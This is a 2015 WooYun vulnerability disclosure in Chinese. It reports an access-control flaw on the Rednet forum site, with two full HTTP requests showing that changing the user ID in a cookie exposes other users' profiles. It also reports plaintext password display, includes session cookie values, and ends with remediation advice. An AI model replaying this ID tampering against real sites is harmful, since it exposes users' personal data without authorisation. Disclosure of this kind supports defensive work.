当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108930

漏洞标题:红网论坛存在横向越权漏洞(用户敏感信息泄露)

相关厂商:红网

漏洞作者: 时间飞船

提交时间:2015-04-23 17:35

修复时间:2015-06-07 17:36

公开时间:2015-06-07 17:36

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:6

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

红网论坛存在横向越权漏洞,可以随意浏览他人个人资料。且修改密码时新密码明文显示在界面,注册成功后密码也明文回显。

详细说明:

修改个人资料request,用户身份通过客户端cookie中的ID参数提取:

GET /EditInfor.asp HTTP/1.1
Host: people.rednet.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://people.rednet.cn/EditInfor.asp
Cookie: Hm_lvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429281476,1429369366,1429369682,1429369859; wdcid=338db40657044830; wdlast=1429369888; vjuids=67c7909da.14cc7d09008.0.89455f3a1acd9; vjlast=1429281477.1429368736.13; hiido_tod=17; hiido_ui=0.7879002586247603; hiido_lv=1429368739125; hiido_ti=1429369891704; ASPSESSIONIDSQSTCCDA=IMPOBJHAFAOJNGKJNMADGNNN; Hm_lpvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429369888; wz%5Ftype=; wz%5Fuser%5FLingdaoId=; wz%5Fuser%5FlastLoginDatetime=; wz%5Fuser%5FLoginTimes=; wz%5Fuser%5FTrueName=; wz%5FUser%5Fpass=; wz%5FUser%5FIdName=; wz%5FUser%5FID=; peopleRednet2010=userinfo=tonylee123%40%401847100837f9a043%40%40482ff55ab7bed6efd4c1b238ceb42688&Huiyuan%5FIsLogin=yes&Huiyuan%5FLastLoginDatetime=2015%2F4%2F18+23%3A01%3A52&Huiyuan%5FLoginTimes=10&Huiyuan%5FIdName=tonylee123&Huiyuan%5FID=465825
Connection: keep-alive


漏洞证明:

修改用户ID=1

GET /EditInfor.asp HTTP/1.1
Host: people.rednet.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://people.rednet.cn/EditInfor.asp
Cookie: Hm_lvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429281476,1429369366,1429369682,1429369859; wdcid=338db40657044830; wdlast=1429369888; vjuids=67c7909da.14cc7d09008.0.89455f3a1acd9; vjlast=1429281477.1429368736.13; hiido_tod=17; hiido_ui=0.7879002586247603; hiido_lv=1429368739125; hiido_ti=1429369891704; ASPSESSIONIDSQSTCCDA=IMPOBJHAFAOJNGKJNMADGNNN; Hm_lpvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429369888; wz%5Ftype=; wz%5Fuser%5FLingdaoId=; wz%5Fuser%5FlastLoginDatetime=; wz%5Fuser%5FLoginTimes=; wz%5Fuser%5FTrueName=; wz%5FUser%5Fpass=; wz%5FUser%5FIdName=; wz%5FUser%5FID=; peopleRednet2010=userinfo=tonylee123%40%401847100837f9a043%40%40482ff55ab7bed6efd4c1b238ceb42688&Huiyuan%5FIsLogin=yes&Huiyuan%5FLastLoginDatetime=2015%2F4%2F18+23%3A01%3A52&Huiyuan%5FLoginTimes=10&Huiyuan%5FIdName=tonylee123&Huiyuan%5FID=1
Connection: keep-alive


获得他人资料:

11.PNG


密码输入界面,新密码明文显示

12.PNG


注册成功后密码明文回显

13.PNG


修复方案:

建议从会话中提取用户信息。密码修改输入新密码需隐藏,注册成功不要明文回显密码。

版权声明:转载请注明来源 时间飞船@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)

漏洞评价:

评论

  1. 2015-06-07 18:07 | 绽放的菊花 ( 路人 | Rank:17 漏洞数:2 | 绽放中的菊花)

    未能联系到厂商或者厂商积极拒绝

  2. 2015-06-25 11:07 | F1uYu4n ( 实习白帽子 | Rank:71 漏洞数:14 | CTF)

    已利用 查水表成功